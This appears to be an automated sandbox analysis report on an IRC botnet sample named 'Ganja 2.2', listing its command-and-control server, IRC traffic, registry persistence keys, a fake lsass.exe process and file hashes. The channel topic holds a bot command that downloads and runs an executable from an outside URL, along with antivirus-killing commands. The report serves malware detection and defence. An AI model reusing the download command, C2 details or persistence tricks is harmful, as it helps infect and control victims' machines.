tep.xylocomod.com 66.96.240.101
Remote Host Port Number
66.96.240.101 9009
NICK n{USA|XP}430851
USER 4308 “” “TsGh” :4308
JOIN ##kuwait## 112211
PRIVMSG ##kuwait## :New Infection! Ganja 2.2 Executed!
Now talking in ##kuwait##
Topic On: [ ##kuwait## ] [ !dl http://fagermoshreq.100free.com/win win.exe 1 | !av.kill | !clean ]
Topic By: [ X ]
Other details
* The following port was open in the system:
Port Protocol Process
1054 TCP lsass.exe (%AppData%lsass.exe)
Registry Modifications
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Windows Update System = “%AppData%lsass.exe”
+ UserFaultCheck = “%System%dumprep 0 -u”
so that lsass.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
+ Taskman = “%AppData%dpjk.exe”
so that dpjk.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ Windows Update System = “%AppData%lsass.exe”
so that lsass.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
lsass.exe %AppData%lsass.exe 61 440 bytes
* There were new memory pages created in the address space of the system process(es):
Process Name Process Filename Allocated Size
lsass.exe %System%lsass.exe 61 440 bytes
lsass.exe %System%lsass.exe 61 440 bytes
lsass.exe %System%lsass.exe 61 440 bytes
lsass.exe %System%lsass.exe 61 440 bytes
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash
1 %AppData%dpjk.exe
[file and pathname of the sample #1] 204 800 bytes MD5: 0x39EEF2D665B9D3FA7D123563A1FB731F
SHA-1: 0x7E9B1CCE17131929094E260388BE8F07C486686A
2 %AppData%lsass.exe
%Temp%8502.exe 118 784 bytes MD5: 0x5A84024D9ED0965E3531E46C996EBD60
SHA-1: 0xFA04D570CEE95AB89A8289986D49BE5FA110185E
3 %Temp%google2cache2.tmp
%Temp%google_cache2.tmp 9 bytes MD5: 0x6C936CB4A4B7F5803BD2E3DEACC3C2FE
SHA-1: 0x561782F6CC10BA3E5AFEAED752F95E589C813891